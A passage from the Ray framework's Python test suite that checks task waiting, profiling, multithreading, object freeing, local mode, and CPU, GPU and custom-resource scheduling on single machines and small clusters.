with pytest.raises(TypeError):
ray.wait(x)
with pytest.raises(TypeError):
ray.wait(1)
with pytest.raises(TypeError):
ray.wait([1])
def test_wait_iterables(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = (f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5))
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
objectids = np.array(
[f.remote(1.0),
f.remote(0.5),
f.remote(0.5),
f.remote(0.5)])
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
def test_multiple_waits_and_gets(shutdown_only):
# It is important to use three workers here, so that the three tasks
# launched in this experiment can run at the same time.
ray.init(num_cpus=3)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
@ray.remote
def g(l):
# The argument l should be a list containing one object ID.
ray.wait([l[0]])
@ray.remote
def h(l):
# The argument l should be a list containing one object ID.
ray.get(l[0])
# Make sure that multiple wait requests involving the same object ID
# all return.
x = f.remote(1)
ray.get([g.remote([x]), g.remote([x])])
# Make sure that multiple get requests involving the same object ID all
# return.
x = f.remote(1)
ray.get([h.remote([x]), h.remote([x])])
def test_caching_functions_to_run(shutdown_only):
# Test that we export functions to run on all workers before the driver
# is connected.
def f(worker_info):
sys.path.append(1)
ray.worker.global_worker.run_function_on_all_workers(f)
def f(worker_info):
sys.path.append(2)
ray.worker.global_worker.run_function_on_all_workers(f)
def g(worker_info):
sys.path.append(3)
ray.worker.global_worker.run_function_on_all_workers(g)
def f(worker_info):
sys.path.append(4)
ray.worker.global_worker.run_function_on_all_workers(f)
ray.init(num_cpus=1)
@ray.remote
def get_state():
time.sleep(1)
return sys.path[-4], sys.path[-3], sys.path[-2], sys.path[-1]
res1 = get_state.remote()
res2 = get_state.remote()
assert ray.get(res1) == (1, 2, 3, 4)
assert ray.get(res2) == (1, 2, 3, 4)
# Clean up the path on the workers.
def f(worker_info):
sys.path.pop()
sys.path.pop()
sys.path.pop()
sys.path.pop()
ray.worker.global_worker.run_function_on_all_workers(f)
def test_running_function_on_all_workers(shutdown_only):
ray.init(num_cpus=1)
def f(worker_info):
sys.path.append("fake_directory")
ray.worker.global_worker.run_function_on_all_workers(f)
@ray.remote
def get_path1():
return sys.path
assert "fake_directory" == ray.get(get_path1.remote())[-1]
def f(worker_info):
sys.path.pop(-1)
ray.worker.global_worker.run_function_on_all_workers(f)
# Create a second remote function to guarantee that when we call
# get_path2.remote(), the second function to run will have been run on
# the worker.
@ray.remote
def get_path2():
return sys.path
assert "fake_directory" not in ray.get(get_path2.remote())
def test_profiling_api(shutdown_only):
ray.init(num_cpus=2)
@ray.remote
def f():
with ray.profile(
"custom_event",
extra_data={"name": "custom name"}) as ray_prof:
ray_prof.set_attribute("key", "value")
ray.put(1)
object_id = f.remote()
ray.wait([object_id])
ray.get(object_id)
# Wait until all of the profiling information appears in the profile
# table.
timeout_seconds = 20
start_time = time.time()
while True:
if time.time() - start_time > timeout_seconds:
raise Exception("Timed out while waiting for information in "
"profile table.")
profile_data = ray.global_state.chrome_tracing_dump()
event_types = {event["cat"] for event in profile_data}
expected_types = [
"worker_idle",
"task",
"task:deserialize_arguments",
"task:execute",
"task:store_outputs",
"wait_for_function",
"ray.get",
"ray.put",
"ray.wait",
"submit_task",
"fetch_and_run_function",
"register_remote_function",
"custom_event", # This is the custom one from ray.profile.
]
if all(expected_type in event_types
for expected_type in expected_types):
break
@pytest.fixture()
def ray_start_cluster():
cluster = ray.tests.cluster_utils.Cluster()
yield cluster
# The code after the yield will run as teardown code.
ray.shutdown()
cluster.shutdown()
def test_wait_cluster(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
ray.init(redis_address=cluster.redis_address)
@ray.remote(resources={"RemoteResource": 1})
def f():
return
# Submit some tasks that can only be executed on the remote nodes.
tasks = [f.remote() for _ in range(10)]
# Sleep for a bit to let the tasks finish.
time.sleep(1)
_, unready = ray.wait(tasks, num_returns=len(tasks), timeout=0)
# All remote tasks should have finished.
assert len(unready) == 0
def test_object_transfer_dump(ray_start_cluster):
cluster = ray_start_cluster
num_nodes = 3
for i in range(num_nodes):
cluster.add_node(resources={str(i): 1}, object_store_memory=10**9)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f(x):
return
# These objects will live on different nodes.
object_ids = [
f._remote(args=[1], resources={str(i): 1}) for i in range(num_nodes)
]
# Broadcast each object from each machine to each other machine.
for object_id in object_ids:
ray.get([
f._remote(args=[object_id], resources={str(i): 1})
for i in range(num_nodes)
])
# The profiling information only flushes once every second.
time.sleep(1.1)
transfer_dump = ray.global_state.chrome_tracing_object_transfer_dump()
# Make sure the transfer dump can be serialized with JSON.
json.loads(json.dumps(transfer_dump))
assert len(transfer_dump) >= num_nodes**2
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_receive"
}) == num_nodes
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_send"
}) == num_nodes
def test_identical_function_names(shutdown_only):
# Define a bunch of remote functions and make sure that we don't
# accidentally call an older version.
ray.init(num_cpus=1)
num_calls = 200
@ray.remote
def f():
return 1
results1 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 2
results2 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 3
results3 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 4
results4 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 5
results5 = [f.remote() for _ in range(num_calls)]
assert ray.get(results1) == num_calls * [1]
assert ray.get(results2) == num_calls * [2]
assert ray.get(results3) == num_calls * [3]
assert ray.get(results4) == num_calls * [4]
assert ray.get(results5) == num_calls * [5]
@ray.remote
def g():
return 1
@ray.remote # noqa: F811
def g():
return 2
@ray.remote # noqa: F811
def g():
return 3
@ray.remote # noqa: F811
def g():
return 4
@ray.remote # noqa: F811
def g():
return 5
result_values = ray.get([g.remote() for _ in range(num_calls)])
assert result_values == num_calls * [5]
def test_illegal_api_calls(shutdown_only):
ray.init(num_cpus=1)
# Verify that we cannot call put on an ObjectID.
x = ray.put(1)
with pytest.raises(Exception):
ray.put(x)
# Verify that we cannot call get on a regular value.
with pytest.raises(Exception):
ray.get(3)
# TODO(hchen): This test currently doesn't work in Python 2. This is likely
# because plasma client isn't thread-safe. This needs to be fixed from the
# Arrow side. See #4107 for relevant discussions.
@pytest.mark.skipif(six.PY2, reason="Doesn't work in Python 2.")
def test_multithreading(shutdown_only):
# This test requires at least 2 CPUs to finish since the worker does not
# release resources when joining the threads.
ray.init(num_cpus=2)
def run_test_in_multi_threads(test_case, num_threads=10, num_repeats=25):
"""A helper function that runs test cases in multiple threads."""
def wrapper():
for _ in range(num_repeats):
test_case()
time.sleep(random.randint(0, 10) / 1000.0)
return "ok"
executor = ThreadPoolExecutor(max_workers=num_threads)
futures = [executor.submit(wrapper) for _ in range(num_threads)]
for future in futures:
assert future.result() == "ok"
@ray.remote
def echo(value, delay_ms=0):
if delay_ms > 0:
time.sleep(delay_ms / 1000.0)
return value
@ray.remote
class Echo(object):
def echo(self, value):
return value
def test_api_in_multi_threads():
"""Test using Ray api in multiple threads."""
# Test calling remote functions in multiple threads.
def test_remote_call():
value = random.randint(0, 1000000)
result = ray.get(echo.remote(value))
assert value == result
run_test_in_multi_threads(test_remote_call)
# Test multiple threads calling one actor.
actor = Echo.remote()
def test_call_actor():
value = random.randint(0, 1000000)
result = ray.get(actor.echo.remote(value))
assert value == result
run_test_in_multi_threads(test_call_actor)
# Test put and get.
def test_put_and_get():
value = random.randint(0, 1000000)
result = ray.get(ray.put(value))
assert value == result
run_test_in_multi_threads(test_put_and_get)
# Test multiple threads waiting for objects.
num_wait_objects = 10
objects = [
echo.remote(i, delay_ms=10) for i in range(num_wait_objects)
]
def test_wait():
ready, _ = ray.wait(
objects,
num_returns=len(objects),
timeout=1000.0,
)
assert len(ready) == num_wait_objects
assert ray.get(ready) == list(range(num_wait_objects))
run_test_in_multi_threads(test_wait, num_repeats=1)
# Run tests in a driver.
test_api_in_multi_threads()
# Run tests in a worker.
@ray.remote
def run_tests_in_worker():
test_api_in_multi_threads()
return "ok"
assert ray.get(run_tests_in_worker.remote()) == "ok"
# Test actor that runs background threads.
@ray.remote
class MultithreadedActor(object):
def __init__(self):
self.lock = threading.Lock()
self.thread_results = []
def background_thread(self, wait_objects):
try:
# Test wait
ready, _ = ray.wait(
wait_objects,
num_returns=len(wait_objects),
timeout=1000.0,
)
assert len(ready) == len(wait_objects)
for _ in range(20):
num = 10
# Test remote call
results = [echo.remote(i) for i in range(num)]
assert ray.get(results) == list(range(num))
# Test put and get
objects = [ray.put(i) for i in range(num)]
assert ray.get(objects) == list(range(num))
time.sleep(random.randint(0, 10) / 1000.0)
except Exception as e:
with self.lock:
self.thread_results.append(e)
else:
with self.lock:
self.thread_results.append("ok")
def spawn(self):
wait_objects = [echo.remote(i, delay_ms=10) for i in range(10)]
self.threads = [
threading.Thread(
target=self.background_thread, args=(wait_objects, ))
for _ in range(20)
]
[thread.start() for thread in self.threads]
def join(self):
[thread.join() for thread in self.threads]
assert self.thread_results == ["ok"] * len(self.threads)
return "ok"
actor = MultithreadedActor.remote()
actor.spawn.remote()
    assert ray.get(actor.join.remote()) == "ok"
def test_free_objects_multi_node(ray_start_cluster):
# This test will do following:
# 1. Create 3 raylets that each hold an actor.
# 2. Each actor creates an object which is the deletion target.
# 3. Invoke 64 methods on each actor to flush plasma client.
# 4. After flushing, the plasma client releases the targets.
# 5. Check that the deletion targets have been deleted.
# Caution: if remote functions are used instead of actor methods,
# one raylet may create more than one worker to execute the
# tasks, so the flushing operations may be executed in different
# workers and the plasma client holding the deletion target
# may not be flushed.
cluster = ray_start_cluster
config = json.dumps({"object_manager_repeated_push_delay_ms": 1000})
for i in range(3):
cluster.add_node(
num_cpus=1,
resources={"Custom{}".format(i): 1},
_internal_config=config)
ray.init(redis_address=cluster.redis_address)
@ray.remote(resources={"Custom0": 1})
class ActorOnNode0(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"Custom1": 1})
class ActorOnNode1(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"Custom2": 1})
class ActorOnNode2(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
def create(actors):
a = actors[0].get.remote()
b = actors[1].get.remote()
c = actors[2].get.remote()
(l1, l2) = ray.wait([a, b, c], num_returns=3)
assert len(l1) == 3
assert len(l2) == 0
return (a, b, c)
def flush(actors):
        # Flush the release history. The plasma client cache currently
        # maintains a 64-item list; if that number changes, this will fail.
logger.info("Start Flush!")
for i in range(64):
ray.get([actor.get.remote() for actor in actors])
logger.info("Flush finished!")
def run_one_test(actors, local_only):
(a, b, c) = create(actors)
# The three objects should be generated on different object stores.
assert ray.get(a) != ray.get(b)
assert ray.get(a) != ray.get(c)
assert ray.get(c) != ray.get(b)
ray.internal.free([a, b, c], local_only=local_only)
flush(actors)
return (a, b, c)
actors = [
ActorOnNode0.remote(),
ActorOnNode1.remote(),
ActorOnNode2.remote()
]
    # Case 1: run with local_only=False. All 3 objects will be deleted.
(a, b, c) = run_one_test(actors, False)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=1)
# All the objects are deleted.
assert len(l1) == 0
assert len(l2) == 3
    # Case 2: run with local_only=True. Only 1 object will be deleted.
(a, b, c) = run_one_test(actors, True)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=3)
# One object is deleted and 2 objects are not.
assert len(l1) == 2
assert len(l2) == 1
    # The deleted object is the one stored in the same object store as the
    # driver.
local_return = ray.worker.global_worker.plasma_client.store_socket_name
for object_id in l1:
assert ray.get(object_id) != local_return
def test_local_mode(shutdown_only):
@ray.remote
def local_mode_f():
return np.array([0, 0])
@ray.remote
def local_mode_g(x):
x[0] = 1
return x
ray.init(local_mode=True)
@ray.remote
def f():
return np.ones([3, 4, 5])
xref = f.remote()
# Remote functions should return by value.
assert np.alltrue(xref == np.ones([3, 4, 5]))
# Check that ray.get is the identity.
assert np.alltrue(xref == ray.get(xref))
y = np.random.normal(size=[11, 12])
# Check that ray.put is the identity.
assert np.alltrue(y == ray.put(y))
    # Make sure objects are immutable; this example is why we need to copy
    # arguments before passing them into remote functions in local mode.
aref = local_mode_f.remote()
assert np.alltrue(aref == np.array([0, 0]))
bref = local_mode_g.remote(aref)
# Make sure local_mode_g does not mutate aref.
assert np.alltrue(aref == np.array([0, 0]))
assert np.alltrue(bref == np.array([1, 0]))
# wait should return the first num_returns values passed in as the
# first list and the remaining values as the second list
num_returns = 5
object_ids = [ray.put(i) for i in range(20)]
ready, remaining = ray.wait(
object_ids, num_returns=num_returns, timeout=None)
assert ready == object_ids[:num_returns]
assert remaining == object_ids[num_returns:]
# Test actors in LOCAL_MODE.
@ray.remote
class LocalModeTestClass(object):
def __init__(self, array):
self.array = array
def set_array(self, array):
self.array = array
def get_array(self):
return self.array
def modify_and_set_array(self, array):
array[0] = -1
self.array = array
test_actor = LocalModeTestClass.remote(np.arange(10))
# Remote actor functions should return by value
assert np.alltrue(test_actor.get_array.remote() == np.arange(10))
test_array = np.arange(10)
# Remote actor functions should not mutate arguments
test_actor.modify_and_set_array.remote(test_array)
assert np.alltrue(test_array == np.arange(10))
# Remote actor functions should keep state
test_array[0] = -1
assert np.alltrue(test_array == test_actor.get_array.remote())
# Check that actor handles work in Python mode.
@ray.remote
def use_actor_handle(handle):
array = np.ones(10)
handle.set_array.remote(array)
assert np.alltrue(array == ray.get(handle.get_array.remote()))
ray.get(use_actor_handle.remote(test_actor))
def test_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=2)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
time_buffer = 0.3
# At most 10 copies of this can run at once.
@ray.remote(num_cpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(10)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(11)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_cpus=3)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_gpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(2)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_multi_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=10)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
@ray.remote(num_cpus=1, num_gpus=9)
def f(n):
time.sleep(n)
@ray.remote(num_cpus=9, num_gpus=1)
def g(n):
time.sleep(n)
time_buffer = 0.3
start_time = time.time()
ray.get([f.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5), g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_gpu_ids(shutdown_only):
num_gpus = 10
ray.init(num_cpus=10, num_gpus=num_gpus)
@ray.remote(num_gpus=0)
def f0():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=1)
def f1():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=2)
def f2():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=3)
def f3():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 3
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=4)
def f4():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 4
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=5)
def f5():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 5
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
# Wait for all workers to start up.
@ray.remote
def f():
time.sleep(0.1)
return os.getpid()
start_time = time.time()
while True:
if len(set(ray.get([f.remote() for _ in range(10)]))) == 10:
break
if time.time() > start_time + 10:
raise Exception("Timed out while waiting for workers to start "
"up.")
list_of_ids = ray.get([f0.remote() for _ in range(10)])
assert list_of_ids == 10 * [[]]
list_of_ids = ray.get([f1.remote() for _ in range(10)])
set_of_ids = {tuple(gpu_ids) for gpu_ids in list_of_ids}
assert set_of_ids == {(i, ) for i in range(10)}
list_of_ids = ray.get([f2.remote(), f4.remote(), f4.remote()])
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
assert set(all_ids) == set(range(10))
remaining = [f5.remote() for _ in range(20)]
for _ in range(10):
t1 = time.time()
ready, remaining = ray.wait(remaining, num_returns=2)
t2 = time.time()
# There are only 10 GPUs, and each task uses 2 GPUs, so there
# should only be 2 tasks scheduled at a given time, so if we wait
# for 2 tasks to finish, then it should take at least 0.1 seconds
# for each pair of tasks to finish.
assert t2 - t1 > 0.09
list_of_ids = ray.get(ready)
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
# Commenting out the below assert because it seems to fail a lot.
# assert set(all_ids) == set(range(10))
# Test that actors have CUDA_VISIBLE_DEVICES set properly.
@ray.remote
class Actor0(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
@ray.remote(num_gpus=1)
class Actor1(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
a0 = Actor0.remote()
ray.get(a0.test.remote())
a1 = Actor1.remote()
ray.get(a1.test.remote())
def test_zero_cpus(shutdown_only):
ray.init(num_cpus=0)
@ray.remote(num_cpus=0)
def f():
return 1
# The task should be able to execute.
ray.get(f.remote())
def test_zero_cpus_actor(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=0)
cluster.add_node(num_cpus=2)
ray.init(redis_address=cluster.redis_address)
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote
class Foo(object):
def method(self):
return ray.worker.global_worker.plasma_client.store_socket_name
# Make sure tasks and actors run on the remote local scheduler.
a = Foo.remote()
assert ray.get(a.method.remote()) != local_plasma
def test_fractional_resources(shutdown_only):
ray.init(num_cpus=6, num_gpus=3, resources={"Custom": 1})
@ray.remote(num_gpus=0.5)
class Foo1(object):
def method(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
return gpu_ids[0]
foos = [Foo1.remote() for _ in range(6)]
gpu_ids = ray.get([f.method.remote() for f in foos])
for i in range(3):
assert gpu_ids.count(i) == 2
del foos
@ray.remote
class Foo2(object):
def method(self):
pass
# Create an actor that requires 0.7 of the custom resource.
f1 = Foo2._remote([], {}, resources={"Custom": 0.7})
ray.get(f1.method.remote())
# Make sure that we cannot create an actor that requires 0.7 of the
# custom resource. TODO(rkn): Re-enable this once ray.wait is
# implemented.
f2 = Foo2._remote([], {}, resources={"Custom": 0.7})
ready, _ = ray.wait([f2.method.remote()], timeout=0.5)
assert len(ready) == 0
    # Make sure we can start an actor that requires only 0.3 of the custom
# resource.
f3 = Foo2._remote([], {}, resources={"Custom": 0.3})
ray.get(f3.method.remote())
del f1, f3
# Make sure that we get exceptions if we submit tasks that require a
# fractional number of resources greater than 1.
@ray.remote(num_cpus=1.5)
def test():
pass
with pytest.raises(ValueError):
test.remote()
with pytest.raises(ValueError):
Foo2._remote([], {}, resources={"Custom": 1.5})
def test_multiple_local_schedulers(ray_start_cluster):
# This test will define a bunch of tasks that can only be assigned to
# specific local schedulers, and we will check that they are assigned
# to the correct local schedulers.
cluster = ray_start_cluster
cluster.add_node(num_cpus=11, num_gpus=0)
cluster.add_node(num_cpus=5, num_gpus=5)
cluster.add_node(num_cpus=10, num_gpus=1)
ray.init(redis_address=cluster.redis_address)
cluster.wait_for_nodes()
# Define a bunch of remote functions that all return the socket name of
# the plasma store. Since there is a one-to-one correspondence between
# plasma stores and local schedulers (at least right now), this can be
# used to identify which local scheduler the task was assigned to.
# This must be run on the zeroth local scheduler.
@ray.remote(num_cpus=11)
def run_on_0():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first local scheduler.
@ray.remote(num_gpus=2)
def run_on_1():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the second local scheduler.
@ray.remote(num_cpus=6, num_gpus=1)
def run_on_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This can be run anywhere.
@ray.remote(num_cpus=0, num_gpus=0)
def run_on_0_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first or second local scheduler.
@ray.remote(num_gpus=1)
def run_on_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the zeroth or second local scheduler.
@ray.remote(num_cpus=8)
def run_on_0_2():
return ray.worker.global_worker.plasma_client.store_socket_name
def run_lots_of_tasks():
names = []
results = []
for i in range(100):
index = np.random.randint(6)
if index == 0:
names.append("run_on_0")
results.append(run_on_0.remote())
elif index == 1:
names.append("run_on_1")
results.append(run_on_1.remote())
elif index == 2:
names.append("run_on_2")
results.append(run_on_2.remote())
elif index == 3:
names.append("run_on_0_1_2")
results.append(run_on_0_1_2.remote())
elif index == 4:
names.append("run_on_1_2")
results.append(run_on_1_2.remote())
elif index == 5:
names.append("run_on_0_2")
results.append(run_on_0_2.remote())
return names, results
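    # Map each node's plasma store socket name back to the node it belongs to
    # using the GPU counts configured above (0, 5 and 1 GPUs for the zeroth,
    # first and second node respectively), so the checks below can verify
    # task placement.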
client_table = ray.global_state.client_table()
store_names = []
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 0
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 5
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 1
]
assert len(store_names) == 3
def validate_names_and_results(names, results):
for name, result in zip(names, ray.get(results)):
if name == "run_on_0":
assert result in [store_names[0]]
elif name == "run_on_1":
assert result in [store_names[1]]
elif name == "run_on_2":
assert result in [store_names[2]]
elif name == "run_on_0_1_2":
assert (result in [
store_names[0], store_names[1], store_names[2]
])
elif name == "run_on_1_2":
assert result in [store_names[1], store_names[2]]
elif name == "run_on_0_2":
assert result in [store_names[0], store_names[2]]
else:
raise Exception("This should be unreachable.")
assert set(ray.get(results)) == set(store_names)
names, results = run_lots_of_tasks()
validate_names_and_results(names, results)
# Make sure the same thing works when this is nested inside of a task.
@ray.remote
def run_nested1():
names, results = run_lots_of_tasks()
return names, results
@ray.remote
def run_nested2():
names, results = ray.get(run_nested1.remote())
return names, results
names, results = ray.get(run_nested2.remote())
validate_names_and_results(names, results)
def test_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=3, resources={"CustomResource": 0})
cluster.add_node(num_cpus=3, resources={"CustomResource": 1})
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def h():
ray.get([f.remote() for _ in range(5)])
return ray.worker.global_worker.plasma_client.store_socket_name
# The f tasks should be scheduled on both local schedulers.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The g tasks should be scheduled only on the second local scheduler.
local_scheduler_ids = set(ray.get([g.remote() for _ in range(50)]))
assert len(local_scheduler_ids) == 1
assert list(local_scheduler_ids)[0] != local_plasma
    # Make sure that resource bookkeeping works when a task that uses a
    # custom resource gets blocked.
ray.get([h.remote() for _ in range(5)])
def test_two_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 1,
"CustomResource2": 2
})
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 3,
"CustomResource2": 4
})
ray.init(redis_address=cluster.redis_address)
@ray.remote(resources={"CustomResource1": 1})
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource2": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 1, "CustomResource2": 3})
def h():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 4})
def j():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource3": 1})
def k():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
# The f and g tasks should be scheduled on both local schedulers.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
assert len(set(ray.get([g.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The h tasks should be scheduled only on the second local scheduler.
local_scheduler_ids = set(ray.get([h.remote() for _ in range(50)]))
assert len(local_scheduler_ids) == 1
assert list(local_scheduler_ids)[0] != local_plasma
# Make sure that tasks with unsatisfied custom resource requirements do
# not get scheduled.
ready_ids, remaining_ids = ray.wait([j.remote(), k.remote()], timeout=0.5)
assert ready_ids == []
def test_many_custom_resources(shutdown_only):
num_custom_resources = 10000
total_resources = {
str(i): np.random.randint(1, 7)
for i in range(num_custom_resources)
}
ray.init(num_cpus=5, resources=total_resources)
def f():
return 1
remote_functions = []
for _ in range(20):
num_resources = np.random.randint(0, num_custom_resources + 1)
permuted_resources = np.random.permutation(
num_custom_resources)[:num_resources]
random_resources = {
str(i): total_resources[str(i)]
for i in permuted_resources
}
remote_function = ray.remote(resources=random_resources)(f)
remote_functions.append(remote_function)
remote_functions.append(ray.remote(f))
remote_functions.append(ray.remote(resources=total_resources)(f))
results = []
for remote_function in remote_functions:
results.append(remote_function.remote())
results.append(remote_function.remote())
results.append(remote_function.remote())
ray.get(results)
@pytest.fixture
def save_gpu_ids_shutdown_only():
    # Record the current value of this environment variable so that we can
    # reset it after the test.
original_gpu_ids = os.environ.get("CUDA_VISIBLE_DEVICES", None)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
# Reset the environment variable.
if original_gpu_ids is not None:
os.environ["CUDA_VISIBLE_DEVICES"] = original_gpu_ids
else:
del os.environ["CUDA_VISIBLE_DEVICES"]
def test_specific_gpus(save_gpu_ids_shutdown_only):
allowed_gpu_ids = [4, 5, 6]
os.environ["CUDA_VISIBLE_DEVICES"] = ",".join(
[str(i) for i in allowed_gpu_ids])
